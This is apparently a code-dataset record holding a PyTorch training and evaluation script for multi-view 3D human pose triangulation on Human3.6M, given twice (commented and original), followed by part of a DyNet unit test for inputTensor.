            iterator = islice(iterator, config.opt.n_iters_per_epoch)
        for iter_i, batch in iterator:
            with autograd.detect_anomaly():
                # measure data loading time
                data_time = time.time() - end
                if batch is None:
                    print("Found None batch")
                    continue
                images_batch, keypoints_3d_gt, keypoints_3d_validity_gt, proj_matricies_batch = dataset_utils.prepare_batch(batch, device, config)
                keypoints_2d_pred, cuboids_pred, base_points_pred = None, None, None
                if model_type == "alg" or model_type == "ransac":
                    keypoints_3d_pred, keypoints_2d_pred, heatmaps_pred, confidences_pred = model(images_batch, proj_matricies_batch, batch)
                elif model_type == "vol":
                    keypoints_3d_pred, heatmaps_pred, volumes_pred, confidences_pred, cuboids_pred, coord_volumes_pred, base_points_pred = model(images_batch, proj_matricies_batch, batch)
                batch_size, n_views, image_shape = images_batch.shape[0], images_batch.shape[1], tuple(images_batch.shape[3:])
                n_joints = keypoints_3d_pred[0].shape[1]
                keypoints_3d_binary_validity_gt = (keypoints_3d_validity_gt > 0.0).type(torch.float32)
                scale_keypoints_3d = config.opt.scale_keypoints_3d if hasattr(config.opt, "scale_keypoints_3d") else 1.0
                # 1-view case: absolute depth is unobservable, so make both GT and
                # prediction relative to a base joint before computing the loss
                if n_views == 1:
                    if config.kind == "human36m":
                        base_joint = 6
                    elif config.kind == "coco":
                        base_joint = 11
                    keypoints_3d_gt_transformed = keypoints_3d_gt.clone()
                    keypoints_3d_gt_transformed[:, torch.arange(n_joints) != base_joint] -= keypoints_3d_gt_transformed[:, base_joint:base_joint + 1]
                    keypoints_3d_gt = keypoints_3d_gt_transformed
                    keypoints_3d_pred_transformed = keypoints_3d_pred.clone()
                    keypoints_3d_pred_transformed[:, torch.arange(n_joints) != base_joint] -= keypoints_3d_pred_transformed[:, base_joint:base_joint + 1]
                    keypoints_3d_pred = keypoints_3d_pred_transformed
                # calculate loss
                total_loss = 0.0
                loss = criterion(keypoints_3d_pred * scale_keypoints_3d, keypoints_3d_gt * scale_keypoints_3d, keypoints_3d_binary_validity_gt)
                total_loss += loss
                metric_dict[f'{config.opt.criterion}'].append(loss.item())
                # volumetric ce loss
                use_volumetric_ce_loss = config.opt.use_volumetric_ce_loss if hasattr(config.opt, "use_volumetric_ce_loss") else False
                if use_volumetric_ce_loss:
                    volumetric_ce_criterion = VolumetricCELoss()
                    loss = volumetric_ce_criterion(coord_volumes_pred, volumes_pred, keypoints_3d_gt, keypoints_3d_binary_validity_gt)
                    metric_dict['volumetric_ce_loss'].append(loss.item())
                    weight = config.opt.volumetric_ce_loss_weight if hasattr(config.opt, "volumetric_ce_loss_weight") else 1.0
                    total_loss += weight * loss
                metric_dict['total_loss'].append(total_loss.item())
                if is_train:
                    opt.zero_grad()
                    total_loss.backward()
                    if hasattr(config.opt, "grad_clip"):
                        torch.nn.utils.clip_grad_norm_(model.parameters(), config.opt.grad_clip / config.opt.lr)
                    metric_dict['grad_norm_times_lr'].append(config.opt.lr * misc.calc_gradient_norm(filter(lambda x: x[1].requires_grad, model.named_parameters())))
                    opt.step()
                # calculate metrics
                l2 = KeypointsL2Loss()(keypoints_3d_pred * scale_keypoints_3d, keypoints_3d_gt * scale_keypoints_3d, keypoints_3d_binary_validity_gt)
                metric_dict['l2'].append(l2.item())
                # base point l2
                if base_points_pred is not None:
                    base_point_l2_list = []
                    for batch_i in range(batch_size):
                        base_point_pred = base_points_pred[batch_i]
                        if config.model.kind == "coco":
                            # BUGFIX: was `keypoints_3d[batch_i, 12, :3]` -- an
                            # undefined name that raised NameError on this branch
                            base_point_gt = (keypoints_3d_gt[batch_i, 11, :3] + keypoints_3d_gt[batch_i, 12, :3]) / 2
                        elif config.model.kind == "mpii":
                            base_point_gt = keypoints_3d_gt[batch_i, 6, :3]
                        base_point_l2_list.append(torch.sqrt(torch.sum((base_point_pred * scale_keypoints_3d - base_point_gt * scale_keypoints_3d) ** 2)).item())
                    base_point_l2 = 0.0 if len(base_point_l2_list) == 0 else np.mean(base_point_l2_list)
                    metric_dict['base_point_l2'].append(base_point_l2)
                # save answers for evaluation
                if not is_train:
                    results['keypoints_3d'].append(keypoints_3d_pred.detach().cpu().numpy())
                    results['indexes'].append(batch['indexes'])
                # plot visualization
                if master:
                    if n_iters_total % config.vis_freq == 0:
                        vis_kind = config.kind
                        if (config.transfer_cmu_to_human36m if hasattr(config, "transfer_cmu_to_human36m") else False):
                            vis_kind = "coco"
                        for batch_i in range(min(batch_size, config.vis_n_elements)):
                            keypoints_vis = vis.visualize_batch(
                                images_batch, heatmaps_pred, keypoints_2d_pred, proj_matricies_batch,
                                keypoints_3d_gt, keypoints_3d_pred,
                                kind=vis_kind,
                                cuboids_batch=cuboids_pred,
                                confidences_batch=confidences_pred,
                                batch_index=batch_i, size=5,
                                max_n_cols=10
                            )
                            writer.add_image(f"{name}/keypoints_vis/{batch_i}", keypoints_vis.transpose(2, 0, 1), global_step=n_iters_total)
                            heatmaps_vis = vis.visualize_heatmaps(
                                images_batch, heatmaps_pred,
                                kind=vis_kind,
                                batch_index=batch_i, size=5,
                                max_n_rows=10, max_n_cols=10
                            )
                            writer.add_image(f"{name}/heatmaps/{batch_i}", heatmaps_vis.transpose(2, 0, 1), global_step=n_iters_total)
                            if model_type == "vol":
                                volumes_vis = vis.visualize_volumes(
                                    images_batch, volumes_pred, proj_matricies_batch,
                                    kind=vis_kind,
                                    cuboids_batch=cuboids_pred,
                                    batch_index=batch_i, size=5,
                                    max_n_rows=1, max_n_cols=16
                                )
                                writer.add_image(f"{name}/volumes/{batch_i}", volumes_vis.transpose(2, 0, 1), global_step=n_iters_total)
                    # dump weights to tensorboard
                    if n_iters_total % config.vis_freq == 0:
                        for p_name, p in model.named_parameters():
                            try:
                                writer.add_histogram(p_name, p.clone().cpu().data.numpy(), n_iters_total)
                            except ValueError as e:
                                print(e)
                                print(p_name, p)
                                exit()
                    # dump to tensorboard per-iter loss/metric stats
                    if is_train:
                        for title, value in metric_dict.items():
                            writer.add_scalar(f"{name}/{title}", value[-1], n_iters_total)
                    # measure elapsed time
                    batch_time = time.time() - end
                    end = time.time()
                    # dump to tensorboard per-iter time stats
                    writer.add_scalar(f"{name}/batch_time", batch_time, n_iters_total)
                    writer.add_scalar(f"{name}/data_time", data_time, n_iters_total)
                    # dump to tensorboard per-iter stats about sizes
                    writer.add_scalar(f"{name}/batch_size", batch_size, n_iters_total)
                    writer.add_scalar(f"{name}/n_views", n_views, n_iters_total)
                n_iters_total += 1
    # calculate evaluation metrics
    if master:
        if not is_train:
            results['keypoints_3d'] = np.concatenate(results['keypoints_3d'], axis=0)
            results['indexes'] = np.concatenate(results['indexes'])
            try:
                scalar_metric, full_metric = dataloader.dataset.evaluate(results['keypoints_3d'])
            except Exception as e:
                # Best-effort: evaluation failure must not kill the run.
                print("Failed to evaluate. Reason: ", e)
                scalar_metric, full_metric = 0.0, {}
            metric_dict['dataset_metric'].append(scalar_metric)
            checkpoint_dir = os.path.join(experiment_dir, "checkpoints", "{:04}".format(epoch))
            os.makedirs(checkpoint_dir, exist_ok=True)
            # dump results
            with open(os.path.join(checkpoint_dir, "results.pkl"), 'wb') as fout:
                pickle.dump(results, fout)
            # dump full metric (dropped pointless `.format(epoch)` on a
            # template with no placeholder -- the name is constant)
            with open(os.path.join(checkpoint_dir, "metric.json"), 'w') as fout:
                json.dump(full_metric, fout, indent=4, sort_keys=True)
        # dump to tensorboard per-epoch stats
        for title, value in metric_dict.items():
            writer.add_scalar(f"{name}/{title}_epoch", np.mean(value), epoch)
    return n_iters_total
def init_distributed(args):
    """Initialise torch.distributed when launched under a multi-process launcher.

    Returns True when distributed training was initialised, False for
    single-process runs (WORLD_SIZE unset or < 1).
    """
    if "WORLD_SIZE" not in os.environ or int(os.environ["WORLD_SIZE"]) < 1:
        return False
    torch.cuda.set_device(args.local_rank)
    assert os.environ["MASTER_PORT"], "set the MASTER_PORT variable or use pytorch launcher"
    # BUGFIX: corrected "explicityly" typo in the original assert message.
    assert os.environ["RANK"], "use pytorch launcher and explicitly state the rank of the process"
    # Seed before process-group init so all ranks start identically.
    torch.manual_seed(args.seed)
    torch.distributed.init_process_group(backend="nccl", init_method="env://")
    return True
def main(args):
    """Entry point: build model, criterion, optimizer and dataloaders from the
    config, then run the train loop or a single evaluation pass."""
    print("Number of available GPUs: {}".format(torch.cuda.device_count()))
    is_distributed = init_distributed(args)
    # Only the master process (rank 0, or single-process runs) logs and saves.
    master = True
    if is_distributed and os.environ["RANK"]:
        master = int(os.environ["RANK"]) == 0
    if is_distributed:
        device = torch.device(args.local_rank)
    else:
        device = torch.device(0)
    # config
    config = cfg.load_config(args.config)
    config.opt.n_iters_per_epoch = config.opt.n_objects_per_epoch // config.opt.batch_size
    # Select the triangulation model class by its config name.
    model = {
        "ransac": RANSACTriangulationNet,
        "alg": AlgebraicTriangulationNet,
        "vol": VolumetricTriangulationNet
    }[config.model.name](config, device=device).to(device)
    if config.model.init_weights:
        state_dict = torch.load(config.model.checkpoint)
        # Strip the DataParallel/DDP "module." prefix so keys match a bare model.
        for key in list(state_dict.keys()):
            new_key = key.replace("module.", "")
            state_dict[new_key] = state_dict.pop(key)
        model.load_state_dict(state_dict, strict=True)
        print("Successfully loaded pretrained weights for whole model")
    # criterion
    criterion_class = {
        "MSE": KeypointsMSELoss,
        "MSESmooth": KeypointsMSESmoothLoss,
        "MAE": KeypointsMAELoss
    }[config.opt.criterion]
    if config.opt.criterion == "MSESmooth":
        criterion = criterion_class(config.opt.mse_smooth_threshold)
    else:
        criterion = criterion_class()
    # optimizer (only needed when training)
    opt = None
    if not args.eval:
        if config.model.name == "vol":
            # Per-submodule learning rates for the volumetric model.
            opt = torch.optim.Adam(
                [{'params': model.backbone.parameters()},
                 {'params': model.process_features.parameters(), 'lr': config.opt.process_features_lr if hasattr(config.opt, "process_features_lr") else config.opt.lr},
                 {'params': model.volume_net.parameters(), 'lr': config.opt.volume_net_lr if hasattr(config.opt, "volume_net_lr") else config.opt.lr}
                ],
                lr=config.opt.lr
            )
        else:
            opt = optim.Adam(filter(lambda p: p.requires_grad, model.parameters()), lr=config.opt.lr)
    # datasets
    print("Loading data...")
    train_dataloader, val_dataloader, train_sampler = setup_dataloaders(config, distributed_train=is_distributed)
    # experiment
    experiment_dir, writer = None, None
    if master:
        experiment_dir, writer = setup_experiment(config, type(model).__name__, is_train=not args.eval)
    # multi-gpu
    if is_distributed:
        model = DistributedDataParallel(model, device_ids=[device])
    if not args.eval:
        # train loop
        n_iters_total_train, n_iters_total_val = 0, 0
        for epoch in range(config.opt.n_epochs):
            if train_sampler is not None:
                # Re-seed the sampler so each epoch shuffles differently under DDP.
                train_sampler.set_epoch(epoch)
            n_iters_total_train = one_epoch(model, criterion, opt, config, train_dataloader, device, epoch, n_iters_total=n_iters_total_train, is_train=True, master=master, experiment_dir=experiment_dir, writer=writer)
            n_iters_total_val = one_epoch(model, criterion, opt, config, val_dataloader, device, epoch, n_iters_total=n_iters_total_val, is_train=False, master=master, experiment_dir=experiment_dir, writer=writer)
            if master:
                # Save model weights after every epoch.
                checkpoint_dir = os.path.join(experiment_dir, "checkpoints", "{:04}".format(epoch))
                os.makedirs(checkpoint_dir, exist_ok=True)
                torch.save(model.state_dict(), os.path.join(checkpoint_dir, "weights.pth"))
            print(f"{n_iters_total_train} iters done.")
    else:
        # evaluation-only mode: a single pass over the requested split
        if args.eval_dataset == 'train':
            one_epoch(model, criterion, opt, config, train_dataloader, device, 0, n_iters_total=0, is_train=False, master=master, experiment_dir=experiment_dir, writer=writer)
        else:
            one_epoch(model, criterion, opt, config, val_dataloader, device, 0, n_iters_total=0, is_train=False, master=master, experiment_dir=experiment_dir, writer=writer)
    print("Done.")
if __name__ == '__main__':
    # Script entry point: parse CLI arguments and launch training/evaluation.
    args = parse_args()
    print("args: {}".format(args))
    main(args)
| 45.010331 | 218 | 0.626853 | import os
import shutil
import argparse
import time
import json
from datetime import datetime
from collections import defaultdict
from itertools import islice
import pickle
import copy
import numpy as np
import cv2
import torch
from torch import nn
from torch import autograd
import torch.nn.functional as F
import torch.optim as optim
from torch.utils.data import DataLoader
from torch.nn.parallel import DistributedDataParallel
from tensorboardX import SummaryWriter
from mvn.models.triangulation import RANSACTriangulationNet, AlgebraicTriangulationNet, VolumetricTriangulationNet
from mvn.models.loss import KeypointsMSELoss, KeypointsMSESmoothLoss, KeypointsMAELoss, KeypointsL2Loss, VolumetricCELoss
from mvn.utils import img, multiview, op, vis, misc, cfg
from mvn.datasets import human36m
from mvn.datasets import utils as dataset_utils
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument("--config", type=str, required=True, help="Path, where config file is stored")
parser.add_argument('--eval', action='store_true', help="If set, then only evaluation will be done")
parser.add_argument('--eval_dataset', type=str, default='val', help="Dataset split on which evaluate. Can be 'train' and 'val'")
parser.add_argument("--local_rank", type=int, help="Local rank of the process on the node")
parser.add_argument("--seed", type=int, default=42, help="Random seed for reproducibility")
parser.add_argument("--logdir", type=str, default="/Vol1/dbstore/datasets/k.iskakov/logs/multi-view-net-repr", help="Path, where logs will be stored")
args = parser.parse_args()
return args
def setup_human36m_dataloaders(config, is_train, distributed_train):
train_dataloader = None
if is_train:
train_dataset = human36m.Human36MMultiViewDataset(
h36m_root=config.dataset.train.h36m_root,
pred_results_path=config.dataset.train.pred_results_path if hasattr(config.dataset.train, "pred_results_path") else None,
train=True,
test=False,
image_shape=config.image_shape if hasattr(config, "image_shape") else (256, 256),
labels_path=config.dataset.train.labels_path,
with_damaged_actions=config.dataset.train.with_damaged_actions,
scale_bbox=config.dataset.train.scale_bbox,
kind=config.kind,
undistort_images=config.dataset.train.undistort_images,
ignore_cameras=config.dataset.train.ignore_cameras if hasattr(config.dataset.train, "ignore_cameras") else [],
crop=config.dataset.train.crop if hasattr(config.dataset.train, "crop") else True,
)
train_sampler = torch.utils.data.distributed.DistributedSampler(train_dataset) if distributed_train else None
train_dataloader = DataLoader(
train_dataset,
batch_size=config.opt.batch_size,
shuffle=config.dataset.train.shuffle and (train_sampler is None),
sampler=train_sampler,
collate_fn=dataset_utils.make_collate_fn(randomize_n_views=config.dataset.train.randomize_n_views,
min_n_views=config.dataset.train.min_n_views,
max_n_views=config.dataset.train.max_n_views),
num_workers=config.dataset.train.num_workers,
worker_init_fn=dataset_utils.worker_init_fn,
pin_memory=True
)
val_dataset = human36m.Human36MMultiViewDataset(
h36m_root=config.dataset.val.h36m_root,
pred_results_path=config.dataset.val.pred_results_path if hasattr(config.dataset.val, "pred_results_path") else None,
train=False,
test=True,
image_shape=config.image_shape if hasattr(config, "image_shape") else (256, 256),
labels_path=config.dataset.val.labels_path,
with_damaged_actions=config.dataset.val.with_damaged_actions,
retain_every_n_frames_in_test=config.dataset.val.retain_every_n_frames_in_test,
scale_bbox=config.dataset.val.scale_bbox,
kind=config.kind,
undistort_images=config.dataset.val.undistort_images,
ignore_cameras=config.dataset.val.ignore_cameras if hasattr(config.dataset.val, "ignore_cameras") else [],
crop=config.dataset.val.crop if hasattr(config.dataset.val, "crop") else True,
)
val_dataloader = DataLoader(
val_dataset,
batch_size=config.opt.val_batch_size if hasattr(config.opt, "val_batch_size") else config.opt.batch_size,
shuffle=config.dataset.val.shuffle,
collate_fn=dataset_utils.make_collate_fn(randomize_n_views=config.dataset.val.randomize_n_views,
min_n_views=config.dataset.val.min_n_views,
max_n_views=config.dataset.val.max_n_views),
num_workers=config.dataset.val.num_workers,
worker_init_fn=dataset_utils.worker_init_fn,
pin_memory=True
)
return train_dataloader, val_dataloader, train_sampler
def setup_dataloaders(config, is_train=True, distributed_train=False):
if config.dataset.kind == 'human36m':
train_dataloader, val_dataloader, train_sampler = setup_human36m_dataloaders(config, is_train, distributed_train)
else:
raise NotImplementedError("Unknown dataset: {}".format(config.dataset.kind))
return train_dataloader, val_dataloader, train_sampler
def setup_experiment(config, model_name, is_train=True):
prefix = "" if is_train else "eval_"
if config.title:
experiment_title = config.title + "_" + model_name
else:
experiment_title = model_name
experiment_title = prefix + experiment_title
experiment_name = '{}@{}'.format(experiment_title, datetime.now().strftime("%d.%m.%Y-%H:%M:%S"))
print("Experiment name: {}".format(experiment_name))
experiment_dir = os.path.join(args.logdir, experiment_name)
os.makedirs(experiment_dir, exist_ok=True)
checkpoints_dir = os.path.join(experiment_dir, "checkpoints")
os.makedirs(checkpoints_dir, exist_ok=True)
shutil.copy(args.config, os.path.join(experiment_dir, "config.yaml"))
writer = SummaryWriter(os.path.join(experiment_dir, "tb"))
writer.add_text(misc.config_to_str(config), "config", 0)
return experiment_dir, writer
def one_epoch(model, criterion, opt, config, dataloader, device, epoch, n_iters_total=0, is_train=True, caption='', master=False, experiment_dir=None, writer=None):
name = "train" if is_train else "val"
model_type = config.model.name
if is_train:
model.train()
else:
model.eval()
metric_dict = defaultdict(list)
results = defaultdict(list)
grad_context = torch.autograd.enable_grad if is_train else torch.no_grad
with grad_context():
end = time.time()
iterator = enumerate(dataloader)
if is_train and config.opt.n_iters_per_epoch is not None:
iterator = islice(iterator, config.opt.n_iters_per_epoch)
for iter_i, batch in iterator:
with autograd.detect_anomaly():
data_time = time.time() - end
if batch is None:
print("Found None batch")
continue
images_batch, keypoints_3d_gt, keypoints_3d_validity_gt, proj_matricies_batch = dataset_utils.prepare_batch(batch, device, config)
keypoints_2d_pred, cuboids_pred, base_points_pred = None, None, None
if model_type == "alg" or model_type == "ransac":
keypoints_3d_pred, keypoints_2d_pred, heatmaps_pred, confidences_pred = model(images_batch, proj_matricies_batch, batch)
elif model_type == "vol":
keypoints_3d_pred, heatmaps_pred, volumes_pred, confidences_pred, cuboids_pred, coord_volumes_pred, base_points_pred = model(images_batch, proj_matricies_batch, batch)
batch_size, n_views, image_shape = images_batch.shape[0], images_batch.shape[1], tuple(images_batch.shape[3:])
n_joints = keypoints_3d_pred[0].shape[1]
keypoints_3d_binary_validity_gt = (keypoints_3d_validity_gt > 0.0).type(torch.float32)
scale_keypoints_3d = config.opt.scale_keypoints_3d if hasattr(config.opt, "scale_keypoints_3d") else 1.0
if n_views == 1:
if config.kind == "human36m":
base_joint = 6
elif config.kind == "coco":
base_joint = 11
keypoints_3d_gt_transformed = keypoints_3d_gt.clone()
keypoints_3d_gt_transformed[:, torch.arange(n_joints) != base_joint] -= keypoints_3d_gt_transformed[:, base_joint:base_joint + 1]
keypoints_3d_gt = keypoints_3d_gt_transformed
keypoints_3d_pred_transformed = keypoints_3d_pred.clone()
keypoints_3d_pred_transformed[:, torch.arange(n_joints) != base_joint] -= keypoints_3d_pred_transformed[:, base_joint:base_joint + 1]
keypoints_3d_pred = keypoints_3d_pred_transformed
total_loss = 0.0
loss = criterion(keypoints_3d_pred * scale_keypoints_3d, keypoints_3d_gt * scale_keypoints_3d, keypoints_3d_binary_validity_gt)
total_loss += loss
metric_dict[f'{config.opt.criterion}'].append(loss.item())
use_volumetric_ce_loss = config.opt.use_volumetric_ce_loss if hasattr(config.opt, "use_volumetric_ce_loss") else False
if use_volumetric_ce_loss:
volumetric_ce_criterion = VolumetricCELoss()
loss = volumetric_ce_criterion(coord_volumes_pred, volumes_pred, keypoints_3d_gt, keypoints_3d_binary_validity_gt)
metric_dict['volumetric_ce_loss'].append(loss.item())
weight = config.opt.volumetric_ce_loss_weight if hasattr(config.opt, "volumetric_ce_loss_weight") else 1.0
total_loss += weight * loss
metric_dict['total_loss'].append(total_loss.item())
if is_train:
opt.zero_grad()
total_loss.backward()
if hasattr(config.opt, "grad_clip"):
torch.nn.utils.clip_grad_norm_(model.parameters(), config.opt.grad_clip / config.opt.lr)
metric_dict['grad_norm_times_lr'].append(config.opt.lr * misc.calc_gradient_norm(filter(lambda x: x[1].requires_grad, model.named_parameters())))
opt.step()
l2 = KeypointsL2Loss()(keypoints_3d_pred * scale_keypoints_3d, keypoints_3d_gt * scale_keypoints_3d, keypoints_3d_binary_validity_gt)
metric_dict['l2'].append(l2.item())
if base_points_pred is not None:
base_point_l2_list = []
for batch_i in range(batch_size):
base_point_pred = base_points_pred[batch_i]
if config.model.kind == "coco":
base_point_gt = (keypoints_3d_gt[batch_i, 11, :3] + keypoints_3d[batch_i, 12, :3]) / 2
elif config.model.kind == "mpii":
base_point_gt = keypoints_3d_gt[batch_i, 6, :3]
base_point_l2_list.append(torch.sqrt(torch.sum((base_point_pred * scale_keypoints_3d - base_point_gt * scale_keypoints_3d) ** 2)).item())
base_point_l2 = 0.0 if len(base_point_l2_list) == 0 else np.mean(base_point_l2_list)
metric_dict['base_point_l2'].append(base_point_l2)
if not is_train:
results['keypoints_3d'].append(keypoints_3d_pred.detach().cpu().numpy())
results['indexes'].append(batch['indexes'])
if master:
if n_iters_total % config.vis_freq == 0:
vis_kind = config.kind
if (config.transfer_cmu_to_human36m if hasattr(config, "transfer_cmu_to_human36m") else False):
vis_kind = "coco"
for batch_i in range(min(batch_size, config.vis_n_elements)):
keypoints_vis = vis.visualize_batch(
images_batch, heatmaps_pred, keypoints_2d_pred, proj_matricies_batch,
keypoints_3d_gt, keypoints_3d_pred,
kind=vis_kind,
cuboids_batch=cuboids_pred,
confidences_batch=confidences_pred,
batch_index=batch_i, size=5,
max_n_cols=10
)
writer.add_image(f"{name}/keypoints_vis/{batch_i}", keypoints_vis.transpose(2, 0, 1), global_step=n_iters_total)
heatmaps_vis = vis.visualize_heatmaps(
images_batch, heatmaps_pred,
kind=vis_kind,
batch_index=batch_i, size=5,
max_n_rows=10, max_n_cols=10
)
writer.add_image(f"{name}/heatmaps/{batch_i}", heatmaps_vis.transpose(2, 0, 1), global_step=n_iters_total)
if model_type == "vol":
volumes_vis = vis.visualize_volumes(
images_batch, volumes_pred, proj_matricies_batch,
kind=vis_kind,
cuboids_batch=cuboids_pred,
batch_index=batch_i, size=5,
max_n_rows=1, max_n_cols=16
)
writer.add_image(f"{name}/volumes/{batch_i}", volumes_vis.transpose(2, 0, 1), global_step=n_iters_total)
if n_iters_total % config.vis_freq == 0:
for p_name, p in model.named_parameters():
try:
writer.add_histogram(p_name, p.clone().cpu().data.numpy(), n_iters_total)
except ValueError as e:
print(e)
print(p_name, p)
exit()
if is_train:
for title, value in metric_dict.items():
writer.add_scalar(f"{name}/{title}", value[-1], n_iters_total)
batch_time = time.time() - end
end = time.time()
writer.add_scalar(f"{name}/batch_time", batch_time, n_iters_total)
writer.add_scalar(f"{name}/data_time", data_time, n_iters_total)
writer.add_scalar(f"{name}/batch_size", batch_size, n_iters_total)
writer.add_scalar(f"{name}/n_views", n_views, n_iters_total)
n_iters_total += 1
if master:
if not is_train:
results['keypoints_3d'] = np.concatenate(results['keypoints_3d'], axis=0)
results['indexes'] = np.concatenate(results['indexes'])
try:
scalar_metric, full_metric = dataloader.dataset.evaluate(results['keypoints_3d'])
except Exception as e:
print("Failed to evaluate. Reason: ", e)
scalar_metric, full_metric = 0.0, {}
metric_dict['dataset_metric'].append(scalar_metric)
checkpoint_dir = os.path.join(experiment_dir, "checkpoints", "{:04}".format(epoch))
os.makedirs(checkpoint_dir, exist_ok=True)
with open(os.path.join(checkpoint_dir, "results.pkl"), 'wb') as fout:
pickle.dump(results, fout)
with open(os.path.join(checkpoint_dir, "metric.json".format(epoch)), 'w') as fout:
json.dump(full_metric, fout, indent=4, sort_keys=True)
for title, value in metric_dict.items():
writer.add_scalar(f"{name}/{title}_epoch", np.mean(value), epoch)
return n_iters_total
def init_distributed(args):
if "WORLD_SIZE" not in os.environ or int(os.environ["WORLD_SIZE"]) < 1:
return False
torch.cuda.set_device(args.local_rank)
assert os.environ["MASTER_PORT"], "set the MASTER_PORT variable or use pytorch launcher"
assert os.environ["RANK"], "use pytorch launcher and explicityly state the rank of the process"
torch.manual_seed(args.seed)
torch.distributed.init_process_group(backend="nccl", init_method="env://")
return True
def main(args):
    """Train or evaluate a multi-view triangulation model.

    Builds the model selected by the config ("ransac"/"alg"/"vol"), optionally
    loads pretrained weights, sets up the criterion, optimizer and dataloaders,
    then runs the training loop — or a single evaluation pass when ``args.eval``
    is set.
    """
    print("Number of available GPUs: {}".format(torch.cuda.device_count()))
    is_distributed = init_distributed(args)
    # Only rank 0 ("master") writes logs, checkpoints and tensorboard summaries.
    master = True
    if is_distributed and os.environ["RANK"]:
        master = int(os.environ["RANK"]) == 0
    if is_distributed:
        device = torch.device(args.local_rank)
    else:
        device = torch.device(0)
    config = cfg.load_config(args.config)
    # Derive iterations per epoch from the configured object budget.
    config.opt.n_iters_per_epoch = config.opt.n_objects_per_epoch // config.opt.batch_size
    # Dispatch on the configured model name; instantiate and move to device.
    model = {
        "ransac": RANSACTriangulationNet,
        "alg": AlgebraicTriangulationNet,
        "vol": VolumetricTriangulationNet
    }[config.model.name](config, device=device).to(device)
    if config.model.init_weights:
        state_dict = torch.load(config.model.checkpoint)
        # Strip a possible DataParallel "module." prefix from checkpoint keys
        # (iterate over a snapshot of the keys because the dict is mutated).
        for key in list(state_dict.keys()):
            new_key = key.replace("module.", "")
            state_dict[new_key] = state_dict.pop(key)
        model.load_state_dict(state_dict, strict=True)
        print("Successfully loaded pretrained weights for whole model")
    criterion_class = {
        "MSE": KeypointsMSELoss,
        "MSESmooth": KeypointsMSESmoothLoss,
        "MAE": KeypointsMAELoss
    }[config.opt.criterion]
    if config.opt.criterion == "MSESmooth":
        criterion = criterion_class(config.opt.mse_smooth_threshold)
    else:
        criterion = criterion_class()
    # Optimizer is only needed for training; the volumetric model gets
    # per-submodule learning rates (falling back to the global lr).
    opt = None
    if not args.eval:
        if config.model.name == "vol":
            opt = torch.optim.Adam(
                [{'params': model.backbone.parameters()},
                 {'params': model.process_features.parameters(), 'lr': config.opt.process_features_lr if hasattr(config.opt, "process_features_lr") else config.opt.lr},
                 {'params': model.volume_net.parameters(), 'lr': config.opt.volume_net_lr if hasattr(config.opt, "volume_net_lr") else config.opt.lr}
                ],
                lr=config.opt.lr
            )
        else:
            opt = optim.Adam(filter(lambda p: p.requires_grad, model.parameters()), lr=config.opt.lr)
    print("Loading data...")
    train_dataloader, val_dataloader, train_sampler = setup_dataloaders(config, distributed_train=is_distributed)
    # Experiment dir / tensorboard writer exist only on the master process;
    # other ranks pass None through to one_epoch.
    experiment_dir, writer = None, None
    if master:
        experiment_dir, writer = setup_experiment(config, type(model).__name__, is_train=not args.eval)
    if is_distributed:
        model = DistributedDataParallel(model, device_ids=[device])
    if not args.eval:
        n_iters_total_train, n_iters_total_val = 0, 0
        for epoch in range(config.opt.n_epochs):
            # Reshuffle differently each epoch in the distributed sampler.
            if train_sampler is not None:
                train_sampler.set_epoch(epoch)
            n_iters_total_train = one_epoch(model, criterion, opt, config, train_dataloader, device, epoch, n_iters_total=n_iters_total_train, is_train=True, master=master, experiment_dir=experiment_dir, writer=writer)
            n_iters_total_val = one_epoch(model, criterion, opt, config, val_dataloader, device, epoch, n_iters_total=n_iters_total_val, is_train=False, master=master, experiment_dir=experiment_dir, writer=writer)
            if master:
                checkpoint_dir = os.path.join(experiment_dir, "checkpoints", "{:04}".format(epoch))
                os.makedirs(checkpoint_dir, exist_ok=True)
                torch.save(model.state_dict(), os.path.join(checkpoint_dir, "weights.pth"))
            print(f"{n_iters_total_train} iters done.")
    else:
        # Evaluation-only mode: a single non-training pass over the chosen split.
        if args.eval_dataset == 'train':
            one_epoch(model, criterion, opt, config, train_dataloader, device, 0, n_iters_total=0, is_train=False, master=master, experiment_dir=experiment_dir, writer=writer)
        else:
            one_epoch(model, criterion, opt, config, val_dataloader, device, 0, n_iters_total=0, is_train=False, master=master, experiment_dir=experiment_dir, writer=writer)
    print("Done.")
if __name__ == '__main__':
    # Script entry point: parse CLI options, echo them, then train/evaluate.
    cli_args = parse_args()
    print("args: {}".format(cli_args))
    main(cli_args)
| true | true |
1c3c863f8dbfa12aebedfc5f04b59e1dd98d9fe3 | 1,849 | py | Python | python_tests/test_input.py | cherryc/dynet | 54bf3fa04f55f0730a9a21b5708e94dc153394da | [
"Apache-2.0"
] | 1 | 2021-03-10T17:40:09.000Z | 2021-03-10T17:40:09.000Z | python_tests/test_input.py | cherryc/dynet | 54bf3fa04f55f0730a9a21b5708e94dc153394da | [
"Apache-2.0"
] | null | null | null | python_tests/test_input.py | cherryc/dynet | 54bf3fa04f55f0730a9a21b5708e94dc153394da | [
"Apache-2.0"
] | null | null | null | from __future__ import print_function
import dynet as dy
import numpy as np
# Smoke tests for dy.inputTensor: check dims, round-tripped values and squared
# norm for several reshapes of the same 81-element vector, in three modes.
input_vals = np.arange(81)
squared_norm = (input_vals**2).sum()
shapes = [(81,), (3, 27), (3, 3, 9), (3, 3, 3, 3)]
for i in range(4):
    # Not batched: the whole tensor is one instance (batch dimension == 1)
    dy.renew_cg()
    input_tensor = input_vals.reshape(shapes[i])
    x = dy.inputTensor(input_tensor)
    assert (x.dim()[0] == shapes[i] and x.dim()[1] == 1),"Dimension mismatch : {} : ({}, {})".format(x.dim(), shapes[i],1)
    assert (x.npvalue() == input_tensor).all(), "Expression value different from initial value"
    assert dy.squared_norm(x).scalar_value() == squared_norm, "Value mismatch"
    # Batched: the last axis of the input becomes the batch dimension
    dy.renew_cg()
    xb = dy.inputTensor(input_tensor, batched=True)
    assert (xb.dim()[0] == (shapes[i][:-1] if i>0 else (1,)) and xb.dim()[1] == shapes[i][-1]), "Dimension mismatch with batch size : {} : ({}, {})".format(xb.dim(), (shapes[i][:-1] if i>0 else 1),shapes[i][-1])
    assert (xb.npvalue() == input_tensor).all(), "Batched expression value different from initial value"
    # sum_batches collapses the batch axis so the norm matches the unbatched case
    assert dy.sum_batches(dy.squared_norm(xb)).scalar_value() == squared_norm, "Value mismatch"
    # Batched with list: one array per batch element must behave identically
    dy.renew_cg()
    xb = dy.inputTensor([np.asarray(x).transpose() for x in input_tensor.transpose()])
